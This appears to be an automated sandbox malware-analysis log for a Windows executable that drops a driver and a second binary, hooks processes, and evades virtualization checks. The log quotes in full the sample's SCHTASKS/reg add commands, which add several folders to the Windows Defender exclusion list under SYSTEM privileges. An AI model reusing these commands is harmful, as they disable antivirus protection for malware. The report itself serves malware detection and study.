Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeSection loaded: vselog.dllJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeSection loaded: vselog.dllJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: C:\Users\user\Documents\5oqa98.exeFile written: C:\Users\Public\Music\destopbak.iniJump to behavior
Source: 2749837485743-7684385786.05.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: 2749837485743-7684385786.05.exeStatic file information: File size 30885376 > 1048576
Source: 2749837485743-7684385786.05.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x1d59800
Source: 2749837485743-7684385786.05.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: d:\work\iGiveButton\toolbar4\Release_bin\uninstall.pdb source: 5oqa98.exe, 00000008.00000002.2574792265.0000000003DE3000.00000004.00000020.00020000.00000000.sdmp, 5oqa98.exe, 00000008.00000002.2575032341.0000000003E6B000.00000004.00000020.00020000.00000000.sdmp, naBa3A.exe.8.dr
Source: Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
Source: Binary string: R:\Everest\Tree\bin\WatersPrintCaptureProxy.pdb source: 2749837485743-7684385786.05.exe
Source: Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: 5oqa98.exe, 00000007.00000000.2349192191.0000000140014000.00000002.00000001.01000000.00000008.sdmp, 5oqa98.exe, 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp, 5oqa98.exe, 00000008.00000002.2575168949.0000000140014000.00000002.00000001.01000000.00000008.sdmp, 5oqa98.exe, 00000008.00000000.2365695167.0000000140014000.00000002.00000001.01000000.00000008.sdmp, 5oqa98.exe.0.dr
Source: C:\Users\user\Documents\5oqa98.exeCode function: 7_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,7_2_000000014000F000
Source: C:\Users\user\Documents\5oqa98.exeCode function: 8_2_02A4D2DD push qword ptr [rsp+rsi*2-644654D0h]; ret 8_2_02A4D337

Persistence and Installation Behavior

barindex
Drops PE files to the document folder of the user
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeFile created: C:\Users\user\Documents\5oqa98.exeJump to dropped file
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeFile created: C:\Users\user\Documents\vselog.dllJump to dropped file
Sample is not signed and drops a device driver
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeFile created: C:\Users\user\Documents\5oqa98.exeJump to dropped file
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to dropped file
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeFile created: C:\Users\user\Documents\vselog.dllJump to dropped file
Source: C:\Users\user\Documents\5oqa98.exeFile created: C:\Program Files (x86)\naBa3A\naBa3A.exeJump to dropped file
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to dropped file

Boot Survival

barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
Source: C:\Users\user\Documents\5oqa98.exeCode function: 7_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,7_2_0000000140001520

Hooking and other Techniques for Hiding and Protection

barindex
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Source: C:\Users\user\Documents\5oqa98.exeMemory written: PID: 1488 base: 7FF9082F0008 value: E9 EB D9 E9 FF Jump to behavior
Source: C:\Users\user\Documents\5oqa98.exeMemory written: PID: 1488 base: 7FF90818D9F0 value: E9 20 26 16 00 Jump to behavior
Source: C:\Users\user\Documents\5oqa98.exeMemory written: PID: 7688 base: 7FF9082F0008 value: E9 EB D9 E9 FF Jump to behavior
Source: C:\Users\user\Documents\5oqa98.exeMemory written: PID: 7688 base: 7FF90818D9F0 value: E9 20 26 16 00 Jump to behavior
Source: C:\Users\user\Documents\5oqa98.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeRDTSC instruction interceptor: First address: 1400010D8 second address: 1400010EF instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec eax 0x0000000a mov ecx, eax 0x0000000c nop 0x0000000d nop 0x0000000e dec eax 0x0000000f xor edx, edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 fldpi 0x00000015 frndint 0x00000017 rdtsc
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeRDTSC instruction interceptor: First address: 1400010EF second address: 1400010EF instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 xor ebx, ebx 0x00000009 dec eax 0x0000000a mov ebx, edx 0x0000000c dec eax 0x0000000d or eax, ebx 0x0000000f dec eax 0x00000010 sub eax, ecx 0x00000012 nop 0x00000013 dec ebp 0x00000014 xor edx, edx 0x00000016 dec esp 0x00000017 mov edx, eax 0x00000019 dec ebp 0x0000001a cmp edx, eax 0x0000001c jc 00007FEDCCBE34D0h 0x0000001e fldpi 0x00000020 frndint 0x00000022 rdtsc
Source: C:\Users\user\Documents\5oqa98.exeRDTSC instruction interceptor: First address: 62EAF5 second address: 62EB03 instructions: 0x00000000 rdtsc 0x00000002 dec esp 0x00000003 mov ecx, edx 0x00000005 dec ecx 0x00000006 shl ecx, 20h 0x00000009 dec esp 0x0000000a or ecx, eax 0x0000000c frndint 0x0000000e rdtsc
Source: C:\Users\user\Documents\5oqa98.exeCode function: 8_2_0062EAF5 rdtsc 8_2_0062EAF5
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeWindow / User API: threadDelayed 583Jump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeWindow / User API: threadDelayed 416Jump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeDropped PE file which has not been started: C:\Windows\System32\drivers\189atohci.sysJump to dropped file
Source: C:\Users\user\Documents\5oqa98.exeDropped PE file which has not been started: C:\Program Files (x86)\naBa3A\naBa3A.exeJump to dropped file
Source: C:\Users\user\Documents\5oqa98.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_7-14108
Source: C:\Users\user\Documents\5oqa98.exeAPI coverage: 2.7 %
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe TID: 7584Thread sleep count: 583 > 30Jump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe TID: 7584Thread sleep time: -291500s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe TID: 7584Thread sleep count: 416 > 30Jump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe TID: 7584Thread sleep time: -208000s >= -30000sJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Documents\5oqa98.exeCode function: 7_2_00007FF8FF5DA1B8 FindFirstFileExW,7_2_00007FF8FF5DA1B8
Source: 5oqa98.exe, 00000008.00000002.2572103669.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, 5oqa98.exe, 00000008.00000002.2572103669.00000000005FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: 5oqa98.exe, 00000008.00000002.2572103669.0000000000570000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW P]%SystemRoot%\system32\mswsock.dllRR?:P
Source: C:\Users\user\Documents\5oqa98.exeAPI call chain: ExitProcess graph end nodegraph_7-14109
Source: C:\Users\user\Documents\5oqa98.exeAPI call chain: ExitProcess graph end nodegraph_7-14453
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeCode function: 8_2_0062EAF5 rdtsc 8_2_0062EAF5
Source: C:\Users\user\Documents\5oqa98.exeCode function: 7_2_00000001400073E0 LdrLoadDll,7_2_00000001400073E0
Source: C:\Users\user\Documents\5oqa98.exeCode function: 7_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_0000000140007C91
Source: C:\Users\user\Documents\5oqa98.exeCode function: 7_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,7_2_000000014000F000
Source: C:\Users\user\Documents\5oqa98.exeCode function: 7_2_0000000140004630 GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapAlloc,7_2_0000000140004630
Source: C:\Users\user\Documents\5oqa98.exeCode function: 7_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_0000000140007C91
Source: C:\Users\user\Documents\5oqa98.exeCode function: 7_2_00000001400106B0 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00000001400106B0
Source: C:\Users\user\Documents\5oqa98.exeCode function: 7_2_00000001400092E0 SetUnhandledExceptionFilter,7_2_00000001400092E0
Source: C:\Users\user\Documents\5oqa98.exeCode function: 7_2_00007FF8FF5D1F50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00007FF8FF5D1F50
Source: C:\Users\user\Documents\5oqa98.exeCode function: 7_2_00007FF8FF5D2630 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00007FF8FF5D2630
Source: C:\Users\user\Documents\5oqa98.exeCode function: 7_2_00007FF8FF5D76E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00007FF8FF5D76E0

HIPS / PFW / Operating System Protection Evasion

barindex
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Users\user\Documents\5oqa98.exeNtAllocateVirtualMemory: Indirect: 0x140006FD0Jump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeNtDelayExecution: Indirect: 0x1F94D2Jump to behavior
Source: C:\Users\user\Documents\5oqa98.exeNtProtectVirtualMemory: Indirect: 0x2B3B253Jump to behavior
Source: C:\Users\user\Documents\5oqa98.exeNtProtectVirtualMemory: Indirect: 0x2ADB253Jump to behavior
Source: C:\Users\user\Documents\5oqa98.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\programdata\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\5oqa98.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\users\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\5oqa98.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\program files (x86)\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\5oqa98.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"%userprofile%\documents\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\5oqa98.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\programdata\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /fJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\users\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /fJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\program files (x86)\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /fJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"%userprofile%\documents\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /fJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeCode function: 7_2_00007FF8FF5DFD40 cpuid 7_2_00007FF8FF5DFD40
Source: C:\Users\user\Documents\5oqa98.exeCode function: GetLocaleInfoA,7_2_000000014000F370
Source: C:\Users\user\Documents\5oqa98.exeCode function: 7_2_000000014000A370 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,7_2_000000014000A370
